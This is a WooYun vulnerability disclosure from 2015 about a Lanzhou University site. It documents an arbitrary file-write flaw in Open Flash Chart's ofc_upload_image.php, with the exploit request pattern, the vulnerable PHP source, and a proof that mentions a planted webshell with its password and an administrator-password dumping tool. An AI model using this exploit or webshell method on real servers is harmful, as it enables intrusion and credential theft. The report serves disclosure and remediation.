当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135783

漏洞标题:兰州大学某站漏洞文件执行任意后缀文件保存可获取服务器权限

相关厂商:兰州大学

漏洞作者: 路人甲

提交时间:2015-08-21 12:01

修复时间:2015-10-08 08:34

公开时间:2015-10-08 08:34

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-21: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

迂回提权

详细说明:

?>

POST 数据 
文件执行任意后缀文件保存
漏洞文件:/chart/php-ofc-library/ofc_upload_image.php

利用:
/chart/libraries/ofc_upload_image.php?name=m7lrv.php m7lrv.php 文件名

Post任意数据
保存位置http://localhost/chart/tmp-upload-images/m7lrv.php
<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/


// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();


//
// PHP5:
//


// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
echo "FILE UPLOAD FAILED";
}


?>

漏洞证明:

一句话:**.**.**.**/htdocs/dayrui/libraries/tmp-upload-images/m7lrv.php paswd:m7lrv

捕获3.PNG


虚拟终端:

捕获4.PNG


上传管理员用户明文神器:

捕获5.PNG


连之:

捕获6.PNG

修复方案:

1、更新WSS项目管理系统
2、修改管理员密码
3、配置服务器策略和文件夹权限

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-08-24 08:32

厂商回复:

通知用户处理中

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-21 14:29 | LittleMelody ( 路人 | Rank:6 漏洞数:2 | 刚刚入门的小白帽子)

    已成马场,赶紧修复吧